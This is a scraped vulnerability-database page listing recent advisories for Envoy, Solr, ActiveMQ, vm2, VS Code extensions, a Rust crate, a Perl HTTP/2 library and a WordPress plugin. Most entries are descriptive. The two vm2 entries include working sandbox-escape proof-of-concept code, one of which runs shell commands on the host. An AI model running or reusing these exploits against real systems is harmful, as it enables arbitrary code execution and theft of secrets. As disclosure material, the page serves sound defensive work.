Envoy is an L7 proxy and communication bus designed for large modern service-oriented architectures.

Envoy

A vulnerability in Envoy's HTTP/2 downstream request processing allows an unauthenticated remote client to trigger excessive memory consumption, potentially resulting in OOM termination of the Envoy process and denial of service.

CVE-2026-47774

Linux

Linux Kernel

Solr is an enterprise-search platform. Its major features include full-text search, hit highlighting, faceted search, real-time indexing, dynamic clustering, database integration, NoSQL features, and rich document handling.

Apache Solr

Ubuntu is a Linux distribution based on Debian, mostly composed of free and open-source software. Ubuntu is officially released in three editions: Desktop, Server, and Core for internet of things devices and robots. All the editions can run on the computer alone or in a virtual machine.

Linux Ubuntu

Hardcoded credentials in the Basic Authentication setup tool (bin/solr auth enable) in Apache Solr versions 9.4.0 through 9.10.1 and 10.0.0 allows a remote attacker to gain full administrative access to the cluster via publicly known default credentials installed silently alongside the user-specified account. 

As an immediate workaround without upgrading, delete the template users (superadmin, admin, search, index) from security.json or change their passwords.
The future, not yet released, versions 9.11.0 and 10.1.0 will not be vulnerable, and it will be enough to upgrade to solve the issue.

Not affected:
  *  Clusters where bin/solr auth enable was not used to bootstrap BasicAuth
  *  Clusters where template users have been assigned strong passwords after bootstrap

CVE-2026-44825

Homebrew

NixOS

Ubuntu

Ubuntu Security Tracker

Windows

Windows Cumulative Update

Class based , object oriented programming language. Designed to have less dependencies as possible. The syntex of Java is smilier to C and C++. Commonly used for client-server applications. Java files are compiled by JVM (Java Virtual Machine)

Java

Apache ActiveMQ is a high-performance message broker and JMS 1.1 implementation.

Apache ActiveMQ Classic

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ.

Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including
BrokerService.addNetworkConnector(String).

An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter using the "masterslave:// " URL which can allow loading a Spring XML application context using ResourceXmlApplicationContext.
Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().
This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6.

Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue.

CVE-2026-42588

Debian

Linux Debian

Debian Security Tracker

Echo

Maven

GitHub Advisory Database

JavaScript is a high-level, interpreted programming language essential for creating interactive web applications, running directly in web browsers to enable dynamic content and user interface enhancements. It is integral to the web development stack, working seamlessly with HTML and CSS to build responsive and feature-rich websites.

JavaScript

MinimOS is a minimalist operating system designed for simplicity and efficiency. It aims to provide only essential functionalities, making it lightweight and suitable for resource-constrained environments. MinimOS is often used in embedded systems or as a base for custom operating system development.

MinimOS

## Summary
`NodeVM` blocks several dangerous Node.js builtins such as `module`, `worker_threads`, `cluster`, `vm`, `repl`, and `inspector`.
However, the denylist misses `process` and `inspector/promises`. Both can be used from sandboxed code to reach host-side execution primitives.
This allows sandboxed code to bypass the intended builtin restrictions and execute code in the host process.
## Details
The dangerous builtin denylist is defined in `lib/builtin.js`. This list does not include:
```text
process
inspector/promises
```
Non-denied builtins are exposed to the sandbox through:
```js
builtins.set(key, special ? special : vm => vm.readonly(hostRequire(key)));
```
Because of this, sandboxed code can bypass the expected restrictions in two ways:
1. `require('process').getBuiltinModule('child_process')` reloads `child_process`, even when `child_process` is excluded.
2. `require('inspector/promises')` exposes the Inspector protocol and can call `Runtime.evaluate` in the host process.
## PoC
Tested on:
```text
vm2: 3.11.2
Node.js: v25.9.0
```
Run from the vm2 repository root:
```bash
node poc/dangerous-builtin-denylist-rce.js
```
[dangerous-builtin-denylist-rce.js](https://github.com/user-attachments/files/27570113/dangerous-builtin-denylist-rce.js)
The PoC first confirms the intended restrictions work:
```text
require("inspector"): BLOCKED
require("child_process"): BLOCKED
```
Then it bypasses them:
```text
require("process").getBuiltinModule("child_process").execFileSync(...)
```
This spawns a host child process. It also confirms:
```text
require("inspector/promises").Session().post("Runtime.evaluate", ...)
```
This evaluates JavaScript in the host process.
<img width="858" height="766" alt="Screenshot 2026-05-10 at 11 53 33 AM" src="https://github.com/user-attachments/assets/7614aecb-5ffd-4c41-bfe8-e1fcb3b1bb59" />
## Impact
An attacker who can run untrusted JavaScript inside `NodeVM` with affected builtin settings can escape the sandbox and execute arbitrary code in the host process.
This can lead to full compromise of the application process, including reading files, writing files, spawning processes, and accessing host environment secrets.
(This is not reachable with the default NodeVM configuration where require is disabled or no affected builtins are allowed. It affects applications that allow process, inspector/promises, or the wildcard "*" in require.builtin.)
## Suggested fix
Add `process` and `inspector/promises` to the dangerous builtin blocklist.
Also consider blocking dangerous builtin families by prefix, for example blocking both:
```text
inspector
inspector/*
```
instead of only exact module names.

CVE-2026-47140

Minimus

### Summary
A sandbox escape vulnerability in `vm2` allows arbitrary code execution in the host process when untrusted code is executed with async support on runtimes exposing WebAssembly JSPI (`WebAssembly.promising` / `WebAssembly.Suspending`). In the tested configuration, a JSPI-backed Promise can reach `Promise.prototype.finally()` in a way that bypasses the expected Promise-species hardening and exposes a host-originated rejection object to attacker-controlled species logic, breaking the sandbox boundary.
This is a critical sandbox escape: any application that treats `vm2` as a security boundary may be fully compromised.
### Details
On node26, JSPI-backed Promises created through `WebAssembly.promising(...)` do not behave like ordinary sandbox Promises.
That path yields a host-originated `TypeError` during JSPI processing. Inside attacker-controlled species logic reached through `.finally()`, the rejection object exposes a usable host constructor chain. In the tested environment, the rejection object's constructor path can be used to reach host `process`, which leads to arbitrary code execution in the host process.
This behavior is specific to the JSPI / `.finally()` interaction. In contrast, the corresponding `then` / `catch` paths still appeared to route through `vm2`'s expected `localPromise` machinery in my testing.
### PoC
Environment: node:26-bookworm
```javascript
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
(()=>{let b=Uint8Array.of(0,97,115,109,1,0,0,0,1,4,1,96,0,0,2,7,1,1,109,1,102,0,0,3,2,1,0,7,7,1,3,114,117,110,0,1,10,6,1,4,0,16,0,11);WebAssembly.instantiate(b,{m:{f:new WebAssembly.Suspending(()=>WebAssembly.compileStreaming(Promise.resolve(0)))}}).then(r=>{let p=WebAssembly.promising(r.instance.exports.run)();class F{constructor(x){this.s=0;this.q=[];x(v=>{this.s=1;this.v=v;for(let i of this.q)if(i[0])i[0](v)},e=>{
    let P=e.constructor.constructor('return process')()
    P.mainModule.require('child_process').execSync('touch pwned');
    this.s=2;this.v=e;for(let i of this.q)if(i[1])i[1](e)})}then(f,r){if(this.s==1)return f?f(this.v):this.v;if(this.s==2){if(r)return r(this.v);throw this.v}this.q.push([f,r]);return 0}}Object.defineProperty(F,Symbol.species,{get(){return F}});Object.defineProperty(p,'constructor',{get(){return F}});p.finally(()=>{})});return 1})()
`));
```
### Impact
This is a **sandbox escape leading to arbitrary code execution in the host process**.
Who is impacted:
- any application using `vm2` to execute attacker-controlled JavaScript as a security boundary
- especially Node.js runtimes exposing WebAssembly JSPI features (Node 26)
Practical impact:
- arbitrary command execution in the host process
- arbitrary file read / write accessible to the host process
- theft of secrets, tokens, credentials, and application data
- complete compromise of services relying on `vm2` isolation

CVE-2026-47210

The IDE extension RoTracker.rotracker, is removed from VS Marketplace and considered as malicious as of June 7, 2026.

VSMAL-2026-00917

VSCode

Visual Studio Code

Microsoft VSCode Marketplace

The IDE extension RblxTasker.RblxTasker, is removed from VS Marketplace and considered as malicious as of June 7, 2026.

VSMAL-2026-00916

Rust is a multi-paradigm programming language focused on performance and safety, especially safe concurrency.

Rust

The author of `proc-macro-error2` has [confirmed](https://github.com/GnomedDev/proc-macro-error-2/issues/17#issuecomment-4643215473) that the crate is no longer maintained and recommends that users migrate away from it.
`proc-macro-error2` was originally created as a maintained fork of [`proc-macro-error`](https://crates.io/crates/proc-macro-error) (see [RUSTSEC-2024-0370](https://rustsec.org/advisories/RUSTSEC-2024-0370)). Both the original crate and this fork are now unmaintained.
## Possible Alternative(s)
- [manyhow](https://crates.io/crates/manyhow)
- [proc-macro2-diagnostics](https://github.com/SergioBenitez/proc-macro2-diagnostics)

RUSTSEC-2026-0173

RustSec Advisory Database

Debian GNU/Linux is a Linux distribution composed of free and open-source software.

Echo is a secure, minimal Linux OS built vulnerability-free. It is fully compatible across environments and continuously patched - making it a clean, dependable base layer for modern applications. Echo is used by organizations focused on security and reliability, including those with compliance or FIPS requirements.

Protocol::HTTP2 versions through 1.12 for Perl is vulnerable to a HTTP/2 Bomb.

Protocol::HTTP2's inbound HPACK path has no header-list size limit, so a small HTTP/2 request can expand into large server memory (the "HTTP/2 bomb").

The headers_decode method materialises a full key+value copy per indexed reference with no running size check, and the stream_header_block_add method appends (since version 1.12) every CONTINUATION frame to the per-stream buffer unbounded.

MAX_HEADER_LIST_SIZE (default 65536) is advertised in SETTINGS but never consulted on decode.  It is absent from the decoder and from the :limits export tag.

CVE-2026-10725

WordPress is a content management system paired with a MySQL or MariaDB database. Features include a plugin architecture and a template system, referred to within WordPress as Themes.

WordPress

The Booking Package plugin for WordPress is vulnerable to Privilege Escalation via Account Takeover in versions up to, and including, 1.7.16. This is due to a missing capability check on the 'updateUser' branch of the package_app_action AJAX endpoint, where the handler only validates a nonce and the dispatcher invokes Schedule::updateUser() with the $administrator argument hard-coded to 1, bypassing the only owner-restriction check inside that function and allowing the target user to be determined solely by attacker-supplied input passed directly to wp_update_user(). This makes it possible for authenticated attackers, with Editor-level access and above, to change the email address and password of any account, including Administrator accounts, resulting in a full site takeover.

CVE ID	Severità	Punteggio	Tecnologie	Nome del componente	Exploit CISA KEV	Ha la correzione	Data di pubblicazione
CVE-2026-47774	HIGH	N/A	Envoy	cpe:2.3:a:envoyproxy:envoy	No	Sì	Jun 03, 2026
CVE-2026-44825	CRITICAL	9.8	Apache Solr	cpe:2.3:a:apache:solr	No	No	Jun 01, 2026
CVE-2026-42588	HIGH	8.1	Java	activemq	No	Sì	Jun 01, 2026
CVE-2026-47140	CRITICAL	10	JavaScript	vm2	No	Sì	May 29, 2026
CVE-2026-47210	CRITICAL	9.8	JavaScript	vm2	No	Sì	May 29, 2026

CVE ID	Severità	Punteggio	Tecnologie	Nome del componente	Exploit CISA KEV	Ha la correzione	Data di pubblicazione
VSMAL-2026-00917	CRITICAL	N/A	N/A	RoTracker.rotracker	No	Sì	Jun 07, 2026
VSMAL-2026-00916	CRITICAL	N/A	N/A	RblxTasker.RblxTasker	No	Sì	Jun 07, 2026
RUSTSEC-2026-0173	NONE	N/A	Rust	proc-macro-error2	No	No	Jun 07, 2026
CVE-2026-10725	NONE	N/A	Linux Debian	libprotocol-http2-perl	No	No	Jun 06, 2026
CVE-2026-9851	HIGH	7.2	WordPress	booking-package	No	Sì	Jun 06, 2026

Database delle vulnerabilità Wiz

Esplora per tecnologia

Filtri popolari

Alto profilo

Più recenti

I numeri delle vulnerabilità

Il buono, il cattivo e il vulnerabile

Ulteriori risorse Wiz

PEACH

Pronti a vedere Wiz in azione?